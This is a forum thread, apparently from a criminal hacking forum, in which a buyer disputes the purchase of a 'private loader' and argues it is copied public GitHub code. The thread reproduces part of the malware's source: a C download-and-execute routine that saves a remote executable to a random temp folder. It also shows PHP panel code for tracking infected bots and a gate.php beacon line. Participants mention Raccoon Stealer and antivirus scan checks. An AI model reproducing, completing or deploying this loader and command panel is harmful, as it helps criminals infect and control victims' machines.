Арбитраж Покупка приватного лоадера

Статус
Закрыто для дальнейших ответов.

SamanthaGrey

floppy-диск
Пользователь
Регистрация
21.05.2022
Сообщения
9
Реакции
-2
int DownloadAndExecute(char* download_url)
{

char tempPath[MAX_PATH];
GetTempPathA(MAX_PATH, tempPath);

char* randomFolderName = random_string();
char* randomFileName = random_string();
strcat(tempPath, randomFolderName);

CreateDirectoryA(tempPath, NULL);

char installationPath[MAX_PATH];
strcpy(installationPath, tempPath);
strcat(installationPath, "\\");
strcat(installationPath, randomFileName);
strcat(installationPath, ".exe");

URLDownloadToFileA(NULL, download_url, installationPath, NULL, NULL);


# загружает через функцию URLDownloadToFileA URLDownloadToFileA
# https://learn.microsoft.com/en-us/p.../ie-developer/platform-apis/ms775123(v=vs.85)
# Это функция которая сохраняет файл на диск

# Unicode and ANSI names URLDownloadToFileW (Unicode) and URLDownloadToFileA (ANSI)
# ANSI encoding !!!

# в папкe дизай там скрины c Raccoon Stealer
# https://file.io/Q9cwE493WN4V

###########################################

<?php
session_start();
if (!isset($_SESSION['loggedin'])) {
header('Location: login.html');
exit;
}
require("database.php");
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<meta name="description" content="" />
<meta name="author" content="" />
<title>F1 Private Loader</title>
<link href="home.css?v=<?php echo md5(time()); ?>" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css">
</head>

<h1 class="banner">
<div class="text">
F1 Private Loader
</div>
<div class="profile">
Welcome Th30c0der
<!--<img src="profile/avatar.PNG" alt="Avatar" style="height: 40px; border-radius:50%">-->
</div>
</h1>

<ul>
<li style="padding: 15px 0px">
<a href="index.php" class="navbar-items">
<i class='fas fa-robot'></i>
Bots
</a>
</li>
<li style="padding: 15px 0px">
<a href="tasks.php" class="navbar-items">
<i class="fa fa-tasks"></i>
Tasks
</a>
</li>
<li style="padding: 15px 0px">
<a href="logout.php" class="navbar-items">
<i class="fas fa-sign-out-alt"></i>
Logout
</a>
</li>
</ul>

<?php
$OnlineCount = 0;
$OfflineCount = 0;
$TotalCount = 0;

$conn = GetConnection();
$result = CreateQuery($conn, "SELECT * FROM botinfo");
CloseConnection($conn);

while($row = mysqli_fetch_assoc($result)){
$bot_last_request_date = strtotime($row["last_connection"]);
$current_date = strtotime(date("d.m.Y H:i:s")) - 60;

if($bot_last_request_date > $current_date){
$OnlineCount++;
$TotalCount++;
}
else {
$OfflineCount++;
$TotalCount++;
}
}
?>
</html>


# этот кусок кода <?php ?> ничего не выведет на страницу. на странице не будет никакого списка, вообще ничего. пусто, собственно, как и в "дизайне".
# файлов index.php logout.php tasks.php вообще нет. так что ссылки ни куда не ведут.

# в самом "лоадере" используется проект
# https://github.com/nlohmann/json
# чтобы "лоадер" общался с сервером посылая json
# и лоадер получается из-за этого больше 0.5 Мб весит скомпиленный, хотя там кода строчек 200 максимум


# Это ссылка на гитхаб на этого типа
# открытый репозиторий c таким кодом, который идентичен коду, который он скинул

# https://github.com/th30c0der/magnum-loader/blob/main/httpv1.h


# https://github.com/th30c0der/magnum-loader/blob/main/httpv2.h


# вот и еще один файл из "лоадера" который он скинул



# вот его "панель" там

# strcpy(sData,"POST /loader/gate.php HTTP/1.0\r\n");
#


#тут ссылка на весь архив что он скинул
# https://file.io/JcFDoUjHjfzR
 
Пожалуйста, обратите внимание, что пользователь заблокирован
А на кого арбитраж то?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
And on whom is the arbitration?
On me !! please read the code ^_^ Just because i used a public json parser he want to arbitrage me , this guy is newbie .

Were is the programers on xss forum some one tell him the truth .
Yes this function URLDownloadToFileA download file to disk and the file is a dll loader as i told you before its a private method wich i load the dll and the dll load another dll and run exported function from the dll

My checkzilla scan https://checkzilla.io/scan/eea7f941-797f-4243-a5dd-853ef18e35e8

And you can't share my code on public you can share it between admin ,
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Yes this function URLDownloadToFileA download file to disk and the file is a dll loader as i told you before its a private method wich i load the dll and the dll load another dll and run exported function from the dll
So what's so private about this? Sounds like a regular shitty loader from github.

SamanthaGrey, links are dead.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
So what's so private about this? Sounds like a regular shitty loader from github.

SamanthaGrey, links are dead.
this github he shared is my github , and seems not enouph to judge if you have a proof post here and expose me if don't have then watch silent
 
Пожалуйста, обратите внимание, что пользователь заблокирован
A Pooc video of my Loader
i send it to this guy before he start the ESCROW then he decide to start Escrow and after recived the files he start making execuses
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
So where is the links he posted? Did you delete it? For what reason?
Can i ask you why do you sleep in you'r home ? No , why ? because its your home .

Same here its my files , but still i will tell you why delete the github project , first github is not a file hosting i mean not only for uploading project and saving them its for team work u can use same project from different computers upload edits and keep the update sync between the team , that's why the loader files was on github in first place , when i was developing the Loader i upload them to github for this reason , but unfortunately i forogt to change the project visibility to private , and when this dude share it on public i insta delete the project because it's a private project not public and as i said before , The admin can see the fullsource code of the project to decide if its public project or private .

now waiting admin
 
Yes this function URLDownloadToFileA download file to disk and the file is a dll loader as i told you before its a private method wich i load the dll and the dll load another dll and run exported function from the dll
And how you launch a downloaded dll?
strcat(installationPath, ".exe");
From this code i think its something like CreateProcess 😂

<?php ... ?>
What this code for? He write nothing to the page
 
Статус
Закрыто для дальнейших ответов.
Верх